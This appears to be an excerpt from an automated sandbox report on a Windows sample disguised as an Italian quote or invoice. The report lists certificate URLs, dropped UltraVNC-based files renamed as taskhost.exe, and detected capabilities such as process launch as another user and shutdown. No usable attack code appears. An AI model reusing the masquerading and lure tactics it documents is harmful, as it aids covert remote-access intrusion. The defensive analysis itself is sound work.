Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018147463.0000000005565000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://oneocsp.microe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcd.com0&
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr String found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.dr String found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Drops certificate files (DER)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Games\taskhost.exe Code function: 42_2_005F54D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey, 42_2_005F54D0
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B6AD30 NtdllDefWindowProc_W, 0_2_00B6AD30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AD73D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W, 0_2_00AD73D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A605B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00A605B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009F8520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString, 0_2_009F8520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0EA60 NtdllDefWindowProc_W, 0_2_00A0EA60
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009F8BD0 NtdllDefWindowProc_W, 0_2_009F8BD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A02CE0 NtdllDefWindowProc_W, 0_2_00A02CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009FADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow, 0_2_009FADD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A1CDD0 NtdllDefWindowProc_W, 0_2_00A1CDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A02E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00A02E50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A09070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection, 0_2_00A09070
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009FB5C0 NtdllDefWindowProc_W, 0_2_009FB5C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AB55C0 NtdllDefWindowProc_W, 0_2_00AB55C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009FBC20 NtdllDefWindowProc_W, 0_2_009FBC20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009F7D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W, 0_2_009F7D50
Contains functionality to launch a process as a different user
Source: C:\Games\taskhost.exe Code function: 42_2_005AB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces 42_2_005AB8D0
Contains functionality to shutdown / reboot the system
Source: C:\Games\taskhost.exe Code function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces 42_2_005AB8D0
Detected potential crypto function
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054FF706 0_3_054FF706
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054FB671 0_3_054FB671
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B62440 0_2_00B62440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B46F90 0_2_00B46F90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B49080 0_2_00B49080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0F6F0 0_2_00A0F6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B25910 0_2_00B25910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B37CE0 0_2_00B37CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B33C50 0_2_00B33C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B80210 0_2_00B80210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B7C3F0 0_2_00B7C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A1E4E0 0_2_00A1E4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C0C5E2 0_2_00C0C5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A16600 0_2_00A16600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BFA7D0 0_2_00BFA7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A12743 0_2_00A12743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B78800 0_2_00B78800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C029F3 0_2_00C029F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BCCA10 0_2_00BCCA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B8CA50 0_2_00B8CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A22BA0 0_2_00A22BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BF2DEE 0_2_00BF2DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B6CED0 0_2_00B6CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A14E40 0_2_00A14E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B80FB0 0_2_00B80FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BD8F00 0_2_00BD8F00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0B090 0_2_00A0B090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0F180 0_2_00A0F180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BF317C 0_2_00BF317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A03390 0_2_00A03390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009E1490 0_2_009E1490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009E3480 0_2_009E3480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B89470 0_2_00B89470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C05560 0_2_00C05560
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BD3650 0_2_00BD3650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A1F740 0_2_00A1F740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B23750 0_2_00B23750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A63B10 0_2_00A63B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AF9B50 0_2_00AF9B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BD5C90 0_2_00BD5C90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009E7AA0 0_2_009E7AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B7FD90 0_2_00B7FD90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0FF50 0_2_00A0FF50
Source: C:\Games\viewer.exe Code function: 7_2_009667A0 7_2_009667A0
Source: C:\Games\viewer.exe Code function: 7_2_0098E0E0 7_2_0098E0E0
Source: C:\Games\viewer.exe Code function: 7_2_00990040 7_2_00990040
Source: C:\Games\viewer.exe Code function: 7_2_0098B1CB 7_2_0098B1CB
Source: C:\Games\viewer.exe Code function: 7_2_00999151 7_2_00999151
Source: C:\Games\viewer.exe Code function: 7_2_0098B3FD 7_2_0098B3FD
Source: C:\Games\viewer.exe Code function: 7_2_0096C340 7_2_0096C340
Source: C:\Games\viewer.exe Code function: 7_2_0099E498 7_2_0099E498
Source: C:\Games\viewer.exe Code function: 7_2_009867B0 7_2_009867B0
Source: C:\Games\viewer.exe Code function: 7_2_009918B4 7_2_009918B4
Source: C:\Games\viewer.exe Code function: 7_2_009A1804 7_2_009A1804
Source: C:\Games\viewer.exe Code function: 7_2_009A1924 7_2_009A1924
Source: C:\Games\viewer.exe Code function: 7_2_0099FDE4 7_2_0099FDE4
Source: C:\Games\viewer.exe Code function: 7_2_0096DD00 7_2_0096DD00
Source: C:\Games\viewer.exe Code function: 7_2_009A4EF0 7_2_009A4EF0
Source: C:\Games\viewer.exe Code function: 7_2_00999F09 7_2_00999F09
Source: C:\Games\viewer.exe Code function: 7_2_0096FF00 7_2_0096FF00
Source: C:\Games\taskhost.exe Code function: 42_2_00642820 42_2_00642820
Source: C:\Games\taskhost.exe Code function: 42_2_0063F0D0 42_2_0063F0D0
Source: C:\Games\taskhost.exe Code function: 42_2_006BA974 42_2_006BA974
Source: C:\Games\taskhost.exe Code function: 42_2_0059D9F0 42_2_0059D9F0
Source: C:\Games\taskhost.exe Code function: 42_2_0063FA50 42_2_0063FA50
Source: C:\Games\taskhost.exe Code function: 42_2_006C5A2B 42_2_006C5A2B
Source: C:\Games\taskhost.exe Code function: 42_2_006A4362 42_2_006A4362
Source: C:\Games\taskhost.exe Code function: 42_2_006C23F9 42_2_006C23F9
Source: C:\Games\taskhost.exe Code function: 42_2_006AA650 42_2_006AA650
Source: C:\Games\taskhost.exe Code function: 42_2_0059D700 42_2_0059D700
Source: C:\Games\taskhost.exe Code function: 42_2_006A3FD4 42_2_006A3FD4
Found potential string decryption / allocating functions
Source: C:\Games\viewer.exe Code function: String function: 00985630 appears 40 times
Source: C:\Games\viewer.exe Code function: String function: 00985126 appears 60 times
Source: C:\Games\viewer.exe Code function: String function: 009850F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00A05220 appears 35 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 009EAEE0 appears 68 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 009E9320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 009E87F0 appears 52 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 009EA880 appears 59 times
Source: C:\Games\taskhost.exe Code function: String function: 0059CCB0 appears 34 times
PE / OLE file has an invalid certificate
Source: Preventivo24.01.11.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: taskhost.exe.0.dr Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.dr Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Sample file is different than original file name gathered from version info
Source: Preventivo24.01.11.exe, 00000000.00000003.2018147463.0000000005565000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2029764855.0000000005577000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B331000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1976018544.0000000000D6B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
